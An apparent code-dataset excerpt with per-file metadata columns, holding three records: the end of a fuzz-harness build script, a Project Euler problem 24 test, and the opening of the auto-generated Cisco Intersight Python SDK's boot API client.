                subprocess.Popen("clang++ -g -fsanitize=address,undefined,fuzzer " + args.output + filename +".cc -o " + args.output + filename, env=env, shell=True)
            else:
                env = os.environ.copy()
                subprocess.Popen("clang++ -g -fsanitize=address,undefined,fuzzer " + args.output + filename +".cc -o " + args.output + filename, env=env, shell=True, stdout=DEVNULL, stderr=STDOUT)
# Any other -M value is rejected.
else:
    print("Invalid Mode")
| 87.330882
| 956
| 0.551991
| 4,075
| 35,631
| 4.741595
| 0.062331
| 0.055895
| 0.052169
| 0.029604
| 0.915899
| 0.891781
| 0.888469
| 0.875013
| 0.870666
| 0.86932
| 0
| 0.005351
| 0.265668
| 35,631
| 407
| 957
| 87.545455
| 0.733117
| 0
| 0
| 0.738916
| 0
| 0.03202
| 0.240745
| 0.071315
| 0.004926
| 0
| 0
| 0
| 0
| 1
| 0.002463
| false
| 0
| 0.017241
| 0
| 0.022167
| 0.014778
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
70fa31ca462d8c29cda0dd257c4cdb432171d000
| 152
|
py
|
Python
|
tests/test_problem_24.py
|
jcthomassie/euler
|
97e23a1976d40fec7c9c9136f82bdcb145a35f1f
|
[
"MIT"
] | null | null | null |
tests/test_problem_24.py
|
jcthomassie/euler
|
97e23a1976d40fec7c9c9136f82bdcb145a35f1f
|
[
"MIT"
] | 12
|
2020-11-18T00:15:52.000Z
|
2021-07-04T18:21:03.000Z
|
tests/test_problem_24.py
|
jcthomassie/euler
|
97e23a1976d40fec7c9c9136f82bdcb145a35f1f
|
[
"MIT"
] | null | null | null |
from euler.problem_24 import solve
from .utils import validate_solution
def test_solution() -> None:
    """Check that the Problem 24 solver produces the known answer."""
    expected = 2783915460
    validate_solution(solve, answer=expected)
| 19
| 47
| 0.789474
| 20
| 152
| 5.8
| 0.7
| 0.275862
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.091603
| 0.138158
| 152
| 7
| 48
| 21.714286
| 0.793893
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| true
| 0
| 0.5
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
cb605d73e63aa6aeef85f709d7feca503a1d43aa
| 393,603
|
py
|
Python
|
intersight/api/boot_api.py
|
CiscoDevNet/intersight-python
|
04b721f37c3044646a91c185c7259edfb991557a
|
[
"Apache-2.0"
] | 5
|
2021-12-16T15:13:32.000Z
|
2022-03-29T16:09:54.000Z
|
intersight/api/boot_api.py
|
CiscoDevNet/intersight-python
|
04b721f37c3044646a91c185c7259edfb991557a
|
[
"Apache-2.0"
] | 4
|
2022-01-25T19:05:51.000Z
|
2022-03-29T20:18:37.000Z
|
intersight/api/boot_api.py
|
CiscoDevNet/intersight-python
|
04b721f37c3044646a91c185c7259edfb991557a
|
[
"Apache-2.0"
] | 2
|
2020-07-07T15:01:08.000Z
|
2022-01-31T04:27:35.000Z
|
"""
Cisco Intersight
Cisco Intersight is a management platform delivered as a service with embedded analytics for your Cisco and 3rd party IT infrastructure. This platform offers an intelligent level of management that enables IT organizations to analyze, simplify, and automate their environments in more advanced ways than the prior generations of tools. Cisco Intersight provides an integrated and intuitive management experience for resources in the traditional data center as well as at the edge. With flexible deployment options to address complex security needs, getting started with Intersight is quick and easy. Cisco Intersight has deep integration with Cisco UCS and HyperFlex systems allowing for remote deployment, configuration, and ongoing maintenance. The model-based deployment works for a single system in a remote location or hundreds of systems in a data center and enables rapid, standardized configuration and deployment. It also streamlines maintaining those systems whether you are working with small or very large configurations. The Intersight OpenAPI document defines the complete set of properties that are returned in the HTTP response. From that perspective, a client can expect that no additional properties are returned, unless these properties are explicitly defined in the OpenAPI document. However, when a client uses an older version of the Intersight OpenAPI document, the server may send additional properties because the software is more recent than the client. In that case, the client may receive properties that it does not know about. Some generated SDKs perform a strict validation of the HTTP response body against the OpenAPI document. # noqa: E501
The version of the OpenAPI document: 1.0.9-4950
Contact: intersight@cisco.com
Generated by: https://openapi-generator.tech
"""
import re # noqa: F401
import sys # noqa: F401
from intersight.api_client import ApiClient, Endpoint as _Endpoint
from intersight.model_utils import ( # noqa: F401
check_allowed_values,
check_validations,
date,
datetime,
file_type,
none_type,
validate_and_convert_types
)
from intersight.model.boot_cdd_device import BootCddDevice
from intersight.model.boot_cdd_device_response import BootCddDeviceResponse
from intersight.model.boot_device_boot_mode import BootDeviceBootMode
from intersight.model.boot_device_boot_mode_response import BootDeviceBootModeResponse
from intersight.model.boot_device_boot_security import BootDeviceBootSecurity
from intersight.model.boot_device_boot_security_response import BootDeviceBootSecurityResponse
from intersight.model.boot_hdd_device import BootHddDevice
from intersight.model.boot_hdd_device_response import BootHddDeviceResponse
from intersight.model.boot_iscsi_device import BootIscsiDevice
from intersight.model.boot_iscsi_device_response import BootIscsiDeviceResponse
from intersight.model.boot_nvme_device import BootNvmeDevice
from intersight.model.boot_nvme_device_response import BootNvmeDeviceResponse
from intersight.model.boot_pch_storage_device import BootPchStorageDevice
from intersight.model.boot_pch_storage_device_response import BootPchStorageDeviceResponse
from intersight.model.boot_precision_policy import BootPrecisionPolicy
from intersight.model.boot_precision_policy_response import BootPrecisionPolicyResponse
from intersight.model.boot_pxe_device import BootPxeDevice
from intersight.model.boot_pxe_device_response import BootPxeDeviceResponse
from intersight.model.boot_san_device import BootSanDevice
from intersight.model.boot_san_device_response import BootSanDeviceResponse
from intersight.model.boot_sd_device import BootSdDevice
from intersight.model.boot_sd_device_response import BootSdDeviceResponse
from intersight.model.boot_uefi_shell_device import BootUefiShellDevice
from intersight.model.boot_uefi_shell_device_response import BootUefiShellDeviceResponse
from intersight.model.boot_usb_device import BootUsbDevice
from intersight.model.boot_usb_device_response import BootUsbDeviceResponse
from intersight.model.boot_vmedia_device import BootVmediaDevice
from intersight.model.boot_vmedia_device_response import BootVmediaDeviceResponse
from intersight.model.error import Error
class BootApi(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def __create_boot_precision_policy(
    self,
    boot_precision_policy,
    **kwargs
):
    """Create a 'boot.PrecisionPolicy' resource. # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.create_boot_precision_policy(boot_precision_policy, async_req=True)
    >>> result = thread.get()

    Args:
        boot_precision_policy (BootPrecisionPolicy): The 'boot.PrecisionPolicy' resource to create.

    Keyword Args:
        if_match (str): For methods that apply server-side changes, and in particular for PUT, If-Match can be used to prevent the lost update problem. It can check if the modification of a resource that the user wants to upload will not override another change that has been done since the original resource was fetched. If the request cannot be fulfilled, the 412 (Precondition Failed) response is returned. When modifying a resource using POST or PUT, the If-Match header must be set to the value of the resource ModTime property after which no lost update problem should occur. For example, a client sends a GET request to obtain a resource, which includes the ModTime property. The ModTime indicates the last time the resource was created or modified. The client then sends a POST or PUT request with the If-Match header set to the ModTime property of the resource as obtained in the GET request.. [optional]
        if_none_match (str): For methods that apply server-side changes, If-None-Match used with the * value can be used to create a resource not known to exist, guaranteeing that another resource creation didn't happen before, losing the data of the previous put. The request will be processed only if the eventually existing resource's ETag doesn't match any of the values listed. Otherwise, the status code 412 (Precondition Failed) is used. The asterisk is a special value representing any resource. It is only useful when creating a resource, usually with PUT, to check if another resource with the identity has already been created before. The comparison with the stored ETag uses the weak comparison algorithm, meaning two resources are considered identical if the content is equivalent - they don't have to be identical byte for byte.. [optional]
        _return_http_data_only (bool): response data without head status
            code and headers. Default is True.
        _preload_content (bool): if False, the urllib3.HTTPResponse object
            will be returned without reading/decoding response data.
            Default is True.
        _request_timeout (float/tuple): timeout setting for this request. If one
            number provided, it will be total request timeout. It can also
            be a pair (tuple) of (connection, read) timeouts.
            Default is None.
        _check_input_type (bool): specifies if type checking
            should be done on the data sent to the server.
            Default is True.
        _check_return_type (bool): specifies if type checking
            should be done on the data received from the server.
            Default is True.
        _host_index (int/None): specifies the index of the server
            that we want to use.
            Default is read from the configuration.
        async_req (bool): execute request asynchronously

    Returns:
        BootPrecisionPolicy
        If the method is called asynchronously, returns the request
        thread.
    """
    # Fill in the standard request options with their defaults unless the
    # caller supplied explicit values.
    kwargs['async_req'] = kwargs.get(
        'async_req', False
    )
    kwargs['_return_http_data_only'] = kwargs.get(
        '_return_http_data_only', True
    )
    kwargs['_preload_content'] = kwargs.get(
        '_preload_content', True
    )
    kwargs['_request_timeout'] = kwargs.get(
        '_request_timeout', None
    )
    kwargs['_check_input_type'] = kwargs.get(
        '_check_input_type', True
    )
    kwargs['_check_return_type'] = kwargs.get(
        '_check_return_type', True
    )
    # No default here: an absent '_host_index' means "use the configured host".
    kwargs['_host_index'] = kwargs.get('_host_index')
    # The required body parameter travels through kwargs to the generic
    # HTTP dispatcher supplied by _Endpoint.
    kwargs['boot_precision_policy'] = \
        boot_precision_policy
    return self.call_with_http_info(**kwargs)

# Endpoint descriptor exposing the nested function above as
# api.create_boot_precision_policy (POST /api/v1/boot/PrecisionPolicies).
self.create_boot_precision_policy = _Endpoint(
    settings={
        'response_type': (BootPrecisionPolicy,),
        # NOTE(review): 'oAuth2' appears twice in the generated auth list;
        # the duplication is harmless.
        'auth': [
            'cookieAuth',
            'http_signature',
            'oAuth2',
            'oAuth2'
        ],
        'endpoint_path': '/api/v1/boot/PrecisionPolicies',
        'operation_id': 'create_boot_precision_policy',
        'http_method': 'POST',
        'servers': None,
    },
    params_map={
        'all': [
            'boot_precision_policy',
            'if_match',
            'if_none_match',
        ],
        'required': [
            'boot_precision_policy',
        ],
        'nullable': [
        ],
        'enum': [
        ],
        'validation': [
        ]
    },
    root_map={
        'validations': {
        },
        'allowed_values': {
        },
        'openapi_types': {
            'boot_precision_policy':
                (BootPrecisionPolicy,),
            'if_match':
                (str,),
            'if_none_match':
                (str,),
        },
        # Maps python parameter names to their on-the-wire header names.
        'attribute_map': {
            'if_match': 'If-Match',
            'if_none_match': 'If-None-Match',
        },
        'location_map': {
            'boot_precision_policy': 'body',
            'if_match': 'header',
            'if_none_match': 'header',
        },
        'collection_format_map': {
        }
    },
    headers_map={
        'accept': [
            'application/json'
        ],
        'content_type': [
            'application/json'
        ]
    },
    api_client=api_client,
    callable=__create_boot_precision_policy
)
def __delete_boot_precision_policy(
    self,
    moid,
    **kwargs
):
    """Delete a 'boot.PrecisionPolicy' resource. # noqa: E501

    Synchronous by default; pass async_req=True to run the request on a
    worker thread and receive that thread back.

    >>> thread = api.delete_boot_precision_policy(moid, async_req=True)
    >>> result = thread.get()

    Args:
        moid (str): The unique Moid identifier of a resource instance.

    Keyword Args:
        async_req (bool): execute request asynchronously
        _return_http_data_only (bool): return only the response body,
            without status code and headers. Default is True.
        _preload_content (bool): if False, return the raw
            urllib3.HTTPResponse without reading/decoding. Default is True.
        _request_timeout (float/tuple): total timeout, or a
            (connection, read) pair. Default is None.
        _check_input_type (bool): type-check data sent to the server.
            Default is True.
        _check_return_type (bool): type-check data received from the
            server. Default is True.
        _host_index (int/None): index of the server to use; read from
            the configuration when omitted.

    Returns:
        None
        If the method is called asynchronously, returns the request
        thread.
    """
    # Standard request options: keep any caller-supplied value,
    # otherwise install the default.
    request_option_defaults = (
        ('async_req', False),
        ('_return_http_data_only', True),
        ('_preload_content', True),
        ('_request_timeout', None),
        ('_check_input_type', True),
        ('_check_return_type', True),
        ('_host_index', None),
    )
    for option_name, option_default in request_option_defaults:
        kwargs[option_name] = kwargs.get(option_name, option_default)
    # The path parameter rides along in kwargs to the generic dispatcher.
    kwargs['moid'] = moid
    return self.call_with_http_info(**kwargs)

# Endpoint descriptor exposing the nested function above as
# api.delete_boot_precision_policy (DELETE on the Moid-addressed path).
self.delete_boot_precision_policy = _Endpoint(
    settings={
        'response_type': None,
        'auth': ['cookieAuth', 'http_signature', 'oAuth2', 'oAuth2'],
        'endpoint_path': '/api/v1/boot/PrecisionPolicies/{Moid}',
        'operation_id': 'delete_boot_precision_policy',
        'http_method': 'DELETE',
        'servers': None,
    },
    params_map={
        'all': ['moid'],
        'required': ['moid'],
        'nullable': [],
        'enum': [],
        'validation': [],
    },
    root_map={
        'validations': {},
        'allowed_values': {},
        'openapi_types': {'moid': (str,)},
        'attribute_map': {'moid': 'Moid'},
        'location_map': {'moid': 'path'},
        'collection_format_map': {},
    },
    headers_map={
        'accept': ['application/json'],
        'content_type': [],
    },
    api_client=api_client,
    callable=__delete_boot_precision_policy
)
def __get_boot_cdd_device_by_moid(
    self,
    moid,
    **kwargs
):
    """Read a 'boot.CddDevice' resource. # noqa: E501

    Synchronous by default; pass async_req=True to get back a thread
    whose .get() yields the result.

    >>> thread = api.get_boot_cdd_device_by_moid(moid, async_req=True)
    >>> result = thread.get()

    Args:
        moid (str): The unique Moid identifier of a resource instance.

    Keyword Args:
        async_req (bool): execute request asynchronously
        _return_http_data_only (bool): return only the response body,
            without status code and headers. Default is True.
        _preload_content (bool): if False, return the raw
            urllib3.HTTPResponse without reading/decoding. Default is True.
        _request_timeout (float/tuple): total timeout, or a
            (connection, read) pair. Default is None.
        _check_input_type (bool): type-check data sent to the server.
            Default is True.
        _check_return_type (bool): type-check data received from the
            server. Default is True.
        _host_index (int/None): index of the server to use; read from
            the configuration when omitted.

    Returns:
        BootCddDevice
        If the method is called asynchronously, returns the request
        thread.
    """
    # Apply defaults for the standard request options without clobbering
    # anything the caller passed explicitly.
    for option, default in (
        ('async_req', False),
        ('_return_http_data_only', True),
        ('_preload_content', True),
        ('_request_timeout', None),
        ('_check_input_type', True),
        ('_check_return_type', True),
        ('_host_index', None),
    ):
        kwargs.setdefault(option, default)
    kwargs['moid'] = moid
    return self.call_with_http_info(**kwargs)

# Endpoint descriptor exposing the nested function above as
# api.get_boot_cdd_device_by_moid (GET on the Moid-addressed path).
self.get_boot_cdd_device_by_moid = _Endpoint(
    settings={
        'response_type': (BootCddDevice,),
        'auth': ['cookieAuth', 'http_signature', 'oAuth2', 'oAuth2'],
        'endpoint_path': '/api/v1/boot/CddDevices/{Moid}',
        'operation_id': 'get_boot_cdd_device_by_moid',
        'http_method': 'GET',
        'servers': None,
    },
    params_map={
        'all': ['moid'],
        'required': ['moid'],
        'nullable': [],
        'enum': [],
        'validation': [],
    },
    root_map={
        'validations': {},
        'allowed_values': {},
        'openapi_types': {'moid': (str,)},
        'attribute_map': {'moid': 'Moid'},
        'location_map': {'moid': 'path'},
        'collection_format_map': {},
    },
    headers_map={
        'accept': [
            'application/json',
            'text/csv',
            'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
        ],
        'content_type': [],
    },
    api_client=api_client,
    callable=__get_boot_cdd_device_by_moid
)
def __get_boot_cdd_device_list(
    self,
    **kwargs
):
    """Read a 'boot.CddDevice' resource. # noqa: E501

    Returns the (optionally filtered, sorted and paged) collection of
    'boot.CddDevice' resources. Synchronous by default; pass
    async_req=True to receive the request thread instead.

    >>> thread = api.get_boot_cdd_device_list(async_req=True)
    >>> result = thread.get()

    Keyword Args:
        filter (str): OData-style $filter predicate selecting which
            entries to return. [optional]
        orderby (str): Properties used to sort the collection. [optional]
        top (int): Maximum number of resources to return. [optional]
        skip (int): Number of resources to skip. [optional]
        select (str): Subset of properties to return. [optional]
        expand (str): Additional attributes or related resources to
            return. [optional]
        apply (str): Aggregation transformations ("aggregate",
            "groupby") applied in sequence. [optional]
        count (bool): Return the count of matching resources instead of
            the resources themselves. [optional]
        inlinecount (str): Include an inline count of matching
            resources; "allpages" or "none". [optional]
        at (str): Filter on versioning information properties. [optional]
        tags (str): Request a summary of Tag utilization for this
            resource. [optional]
        async_req (bool): execute request asynchronously
        _return_http_data_only (bool): return only the response body.
            Default is True.
        _preload_content (bool): if False, return the raw
            urllib3.HTTPResponse. Default is True.
        _request_timeout (float/tuple): total timeout, or a
            (connection, read) pair. Default is None.
        _check_input_type (bool): type-check data sent. Default is True.
        _check_return_type (bool): type-check data received. Default is True.
        _host_index (int/None): server index; read from configuration
            when omitted.

    Returns:
        BootCddDeviceResponse
        If the method is called asynchronously, returns the request
        thread.
    """
    # Apply defaults for the standard request options without clobbering
    # anything the caller passed explicitly.
    for option, default in (
        ('async_req', False),
        ('_return_http_data_only', True),
        ('_preload_content', True),
        ('_request_timeout', None),
        ('_check_input_type', True),
        ('_check_return_type', True),
        ('_host_index', None),
    ):
        kwargs.setdefault(option, default)
    return self.call_with_http_info(**kwargs)

# All query options accepted by the CddDevice collection endpoint; every
# one of them is sent in the query string.
cdd_device_query_params = [
    'filter', 'orderby', 'top', 'skip', 'select', 'expand',
    'apply', 'count', 'inlinecount', 'at', 'tags',
]
# Endpoint descriptor exposing the nested function above as
# api.get_boot_cdd_device_list (GET on the collection path).
self.get_boot_cdd_device_list = _Endpoint(
    settings={
        'response_type': (BootCddDeviceResponse,),
        'auth': ['cookieAuth', 'http_signature', 'oAuth2', 'oAuth2'],
        'endpoint_path': '/api/v1/boot/CddDevices',
        'operation_id': 'get_boot_cdd_device_list',
        'http_method': 'GET',
        'servers': None,
    },
    params_map={
        'all': list(cdd_device_query_params),
        'required': [],
        'nullable': [],
        'enum': ['inlinecount'],
        'validation': [],
    },
    root_map={
        'validations': {},
        'allowed_values': {
            ('inlinecount',): {
                "ALLPAGES": "allpages",
                "NONE": "none"
            },
        },
        'openapi_types': {
            'filter': (str,),
            'orderby': (str,),
            'top': (int,),
            'skip': (int,),
            'select': (str,),
            'expand': (str,),
            'apply': (str,),
            'count': (bool,),
            'inlinecount': (str,),
            'at': (str,),
            'tags': (str,),
        },
        # OData options carry a '$' prefix on the wire; 'at' and 'tags'
        # are passed through unchanged.
        'attribute_map': {
            'filter': '$filter',
            'orderby': '$orderby',
            'top': '$top',
            'skip': '$skip',
            'select': '$select',
            'expand': '$expand',
            'apply': '$apply',
            'count': '$count',
            'inlinecount': '$inlinecount',
            'at': 'at',
            'tags': 'tags',
        },
        'location_map': {name: 'query' for name in cdd_device_query_params},
        'collection_format_map': {},
    },
    headers_map={
        'accept': [
            'application/json',
            'text/csv',
            'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
        ],
        'content_type': [],
    },
    api_client=api_client,
    callable=__get_boot_cdd_device_list
)
def __get_boot_device_boot_mode_by_moid(
    self,
    moid,
    **kwargs
):
    """Read a 'boot.DeviceBootMode' resource. # noqa: E501

    Synchronous by default; pass async_req=True to get back a thread
    whose .get() yields the result.

    >>> thread = api.get_boot_device_boot_mode_by_moid(moid, async_req=True)
    >>> result = thread.get()

    Args:
        moid (str): The unique Moid identifier of a resource instance.

    Keyword Args:
        async_req (bool): execute request asynchronously
        _return_http_data_only (bool): return only the response body,
            without status code and headers. Default is True.
        _preload_content (bool): if False, return the raw
            urllib3.HTTPResponse without reading/decoding. Default is True.
        _request_timeout (float/tuple): total timeout, or a
            (connection, read) pair. Default is None.
        _check_input_type (bool): type-check data sent to the server.
            Default is True.
        _check_return_type (bool): type-check data received from the
            server. Default is True.
        _host_index (int/None): index of the server to use; read from
            the configuration when omitted.

    Returns:
        BootDeviceBootMode
        If the method is called asynchronously, returns the request
        thread.
    """
    # Apply defaults for the standard request options without clobbering
    # anything the caller passed explicitly.
    for option, default in (
        ('async_req', False),
        ('_return_http_data_only', True),
        ('_preload_content', True),
        ('_request_timeout', None),
        ('_check_input_type', True),
        ('_check_return_type', True),
        ('_host_index', None),
    ):
        kwargs.setdefault(option, default)
    kwargs['moid'] = moid
    return self.call_with_http_info(**kwargs)

# Endpoint descriptor exposing the nested function above as
# api.get_boot_device_boot_mode_by_moid (GET on the Moid-addressed path).
self.get_boot_device_boot_mode_by_moid = _Endpoint(
    settings={
        'response_type': (BootDeviceBootMode,),
        'auth': ['cookieAuth', 'http_signature', 'oAuth2', 'oAuth2'],
        'endpoint_path': '/api/v1/boot/DeviceBootModes/{Moid}',
        'operation_id': 'get_boot_device_boot_mode_by_moid',
        'http_method': 'GET',
        'servers': None,
    },
    params_map={
        'all': ['moid'],
        'required': ['moid'],
        'nullable': [],
        'enum': [],
        'validation': [],
    },
    root_map={
        'validations': {},
        'allowed_values': {},
        'openapi_types': {'moid': (str,)},
        'attribute_map': {'moid': 'Moid'},
        'location_map': {'moid': 'path'},
        'collection_format_map': {},
    },
    headers_map={
        'accept': [
            'application/json',
            'text/csv',
            'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
        ],
        'content_type': [],
    },
    api_client=api_client,
    callable=__get_boot_device_boot_mode_by_moid
)
def __get_boot_device_boot_mode_list(
    self,
    **kwargs
):
    """Read a 'boot.DeviceBootMode' resource. # noqa: E501

    Returns the (optionally filtered, sorted and paged) collection of
    'boot.DeviceBootMode' resources. Synchronous by default; pass
    async_req=True to receive the request thread instead.

    >>> thread = api.get_boot_device_boot_mode_list(async_req=True)
    >>> result = thread.get()

    Keyword Args:
        filter (str): OData-style $filter predicate selecting which
            entries to return. [optional]
        orderby (str): Properties used to sort the collection. [optional]
        top (int): Maximum number of resources to return. [optional]
        skip (int): Number of resources to skip. [optional]
        select (str): Subset of properties to return. [optional]
        expand (str): Additional attributes or related resources to
            return. [optional]
        apply (str): Aggregation transformations ("aggregate",
            "groupby") applied in sequence. [optional]
        count (bool): Return the count of matching resources instead of
            the resources themselves. [optional]
        inlinecount (str): Include an inline count of matching
            resources; "allpages" or "none". [optional]
        at (str): Filter on versioning information properties. [optional]
        tags (str): Request a summary of Tag utilization for this
            resource. [optional]
        async_req (bool): execute request asynchronously
        _return_http_data_only (bool): return only the response body.
            Default is True.
        _preload_content (bool): if False, return the raw
            urllib3.HTTPResponse. Default is True.
        _request_timeout (float/tuple): total timeout, or a
            (connection, read) pair. Default is None.
        _check_input_type (bool): type-check data sent. Default is True.
        _check_return_type (bool): type-check data received. Default is True.
        _host_index (int/None): server index; read from configuration
            when omitted.

    Returns:
        BootDeviceBootModeResponse
        If the method is called asynchronously, returns the request
        thread.
    """
    # Apply defaults for the standard request options without clobbering
    # anything the caller passed explicitly.
    for option, default in (
        ('async_req', False),
        ('_return_http_data_only', True),
        ('_preload_content', True),
        ('_request_timeout', None),
        ('_check_input_type', True),
        ('_check_return_type', True),
        ('_host_index', None),
    ):
        kwargs.setdefault(option, default)
    return self.call_with_http_info(**kwargs)

# All query options accepted by the DeviceBootMode collection endpoint;
# every one of them is sent in the query string.
boot_mode_query_params = [
    'filter', 'orderby', 'top', 'skip', 'select', 'expand',
    'apply', 'count', 'inlinecount', 'at', 'tags',
]
# Endpoint descriptor exposing the nested function above as
# api.get_boot_device_boot_mode_list (GET on the collection path).
self.get_boot_device_boot_mode_list = _Endpoint(
    settings={
        'response_type': (BootDeviceBootModeResponse,),
        'auth': ['cookieAuth', 'http_signature', 'oAuth2', 'oAuth2'],
        'endpoint_path': '/api/v1/boot/DeviceBootModes',
        'operation_id': 'get_boot_device_boot_mode_list',
        'http_method': 'GET',
        'servers': None,
    },
    params_map={
        'all': list(boot_mode_query_params),
        'required': [],
        'nullable': [],
        'enum': ['inlinecount'],
        'validation': [],
    },
    root_map={
        'validations': {},
        'allowed_values': {
            ('inlinecount',): {
                "ALLPAGES": "allpages",
                "NONE": "none"
            },
        },
        'openapi_types': {
            'filter': (str,),
            'orderby': (str,),
            'top': (int,),
            'skip': (int,),
            'select': (str,),
            'expand': (str,),
            'apply': (str,),
            'count': (bool,),
            'inlinecount': (str,),
            'at': (str,),
            'tags': (str,),
        },
        # OData options carry a '$' prefix on the wire; 'at' and 'tags'
        # are passed through unchanged.
        'attribute_map': {
            'filter': '$filter',
            'orderby': '$orderby',
            'top': '$top',
            'skip': '$skip',
            'select': '$select',
            'expand': '$expand',
            'apply': '$apply',
            'count': '$count',
            'inlinecount': '$inlinecount',
            'at': 'at',
            'tags': 'tags',
        },
        'location_map': {name: 'query' for name in boot_mode_query_params},
        'collection_format_map': {},
    },
    headers_map={
        'accept': [
            'application/json',
            'text/csv',
            'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
        ],
        'content_type': [],
    },
    api_client=api_client,
    callable=__get_boot_device_boot_mode_list
)
def __get_boot_device_boot_security_by_moid(
    self,
    moid,
    **kwargs
):
    """Read a 'boot.DeviceBootSecurity' resource. # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.get_boot_device_boot_security_by_moid(moid, async_req=True)
    >>> result = thread.get()
    Args:
        moid (str): The unique Moid identifier of a resource instance.
    Keyword Args:
        _return_http_data_only (bool): return the response data without the
            HTTP status code and headers. Default is True.
        _preload_content (bool): if False, return the urllib3.HTTPResponse
            object without reading/decoding the body. Default is True.
        _request_timeout (float/tuple): total request timeout, or a pair
            (tuple) of (connection, read) timeouts. Default is None.
        _check_input_type (bool): type-check the data sent to the server.
            Default is True.
        _check_return_type (bool): type-check the data received from the
            server. Default is True.
        _host_index (int/None): index of the server to use. Default is
            read from the configuration.
        async_req (bool): execute request asynchronously
    Returns:
        BootDeviceBootSecurity
        If the method is called asynchronously, returns the request
        thread.
    """
    # Fill in the standard per-request options in one pass; setdefault
    # leaves any caller-supplied values untouched.
    for option, default in (
        ('async_req', False),
        ('_return_http_data_only', True),
        ('_preload_content', True),
        ('_request_timeout', None),
        ('_check_input_type', True),
        ('_check_return_type', True),
        ('_host_index', None),
    ):
        kwargs.setdefault(option, default)
    kwargs['moid'] = moid
    return self.call_with_http_info(**kwargs)
# Endpoint: GET /api/v1/boot/DeviceBootSecurities/{Moid} — read a single
# 'boot.DeviceBootSecurity' resource by its Moid path parameter.
self.get_boot_device_boot_security_by_moid = _Endpoint(
    settings={
        'response_type': (BootDeviceBootSecurity,),
        # NOTE: the generated spec listed 'oAuth2' twice; a single entry is
        # sufficient because auth settings are looked up per scheme name.
        'auth': [
            'cookieAuth',
            'http_signature',
            'oAuth2'
        ],
        'endpoint_path': '/api/v1/boot/DeviceBootSecurities/{Moid}',
        'operation_id': 'get_boot_device_boot_security_by_moid',
        'http_method': 'GET',
        'servers': None,
    },
    params_map={
        'all': [
            'moid',
        ],
        'required': [
            'moid',
        ],
        'nullable': [],
        'enum': [],
        'validation': []
    },
    root_map={
        'validations': {},
        'allowed_values': {},
        'openapi_types': {
            'moid': (str,),
        },
        # Python parameter name -> wire name.
        'attribute_map': {
            'moid': 'Moid',
        },
        'location_map': {
            'moid': 'path',
        },
        'collection_format_map': {}
    },
    headers_map={
        'accept': [
            'application/json',
            'text/csv',
            'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
        ],
        'content_type': [],
    },
    api_client=api_client,
    callable=__get_boot_device_boot_security_by_moid
)
def __get_boot_device_boot_security_list(
    self,
    **kwargs
):
    """Read a 'boot.DeviceBootSecurity' resource. # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.get_boot_device_boot_security_list(async_req=True)
    >>> result = thread.get()
    Keyword Args:
        filter (str): OData $filter predicate selecting the subset of
            resources to return. [optional]
        orderby (str): Properties used to sort the collection. [optional]
        top (int): Maximum number of resources to return. [optional]
        skip (int): Number of resources to skip in the response. [optional]
        select (str): Subset of properties to return. [optional]
        expand (str): Additional attributes or related resources to return
            with the primary resources. [optional]
        apply (str): One or more $apply transformations (aggregate/groupby)
            to perform on the resources. [optional]
        count (bool): Return only the count of matching resources. [optional]
        inlinecount (str): Request an inline count of the matching resources
            with the response. [optional]
        at (str): Like $filter, but applied to versioning information
            properties. [optional]
        tags (str): Request a summary of Tag utilization for this
            resource. [optional]
        _return_http_data_only (bool): return the response data without the
            HTTP status code and headers. Default is True.
        _preload_content (bool): if False, return the urllib3.HTTPResponse
            object without reading/decoding the body. Default is True.
        _request_timeout (float/tuple): total request timeout, or a pair
            (tuple) of (connection, read) timeouts. Default is None.
        _check_input_type (bool): type-check the data sent to the server.
            Default is True.
        _check_return_type (bool): type-check the data received from the
            server. Default is True.
        _host_index (int/None): index of the server to use. Default is
            read from the configuration.
        async_req (bool): execute request asynchronously
    Returns:
        BootDeviceBootSecurityResponse
        If the method is called asynchronously, returns the request
        thread.
    """
    # Fill in the standard per-request options in one pass; setdefault
    # leaves any caller-supplied values untouched.
    for option, default in (
        ('async_req', False),
        ('_return_http_data_only', True),
        ('_preload_content', True),
        ('_request_timeout', None),
        ('_check_input_type', True),
        ('_check_return_type', True),
        ('_host_index', None),
    ):
        kwargs.setdefault(option, default)
    return self.call_with_http_info(**kwargs)
# Endpoint: GET /api/v1/boot/DeviceBootSecurities — list
# 'boot.DeviceBootSecurity' resources with the standard OData query parameters.
self.get_boot_device_boot_security_list = _Endpoint(
    settings={
        'response_type': (BootDeviceBootSecurityResponse,),
        # NOTE: the generated spec listed 'oAuth2' twice; a single entry is
        # sufficient because auth settings are looked up per scheme name.
        'auth': [
            'cookieAuth',
            'http_signature',
            'oAuth2'
        ],
        'endpoint_path': '/api/v1/boot/DeviceBootSecurities',
        'operation_id': 'get_boot_device_boot_security_list',
        'http_method': 'GET',
        'servers': None,
    },
    params_map={
        # All supported query parameters; none is required.
        'all': [
            'filter', 'orderby', 'top', 'skip', 'select', 'expand',
            'apply', 'count', 'inlinecount', 'at', 'tags',
        ],
        'required': [],
        'nullable': [],
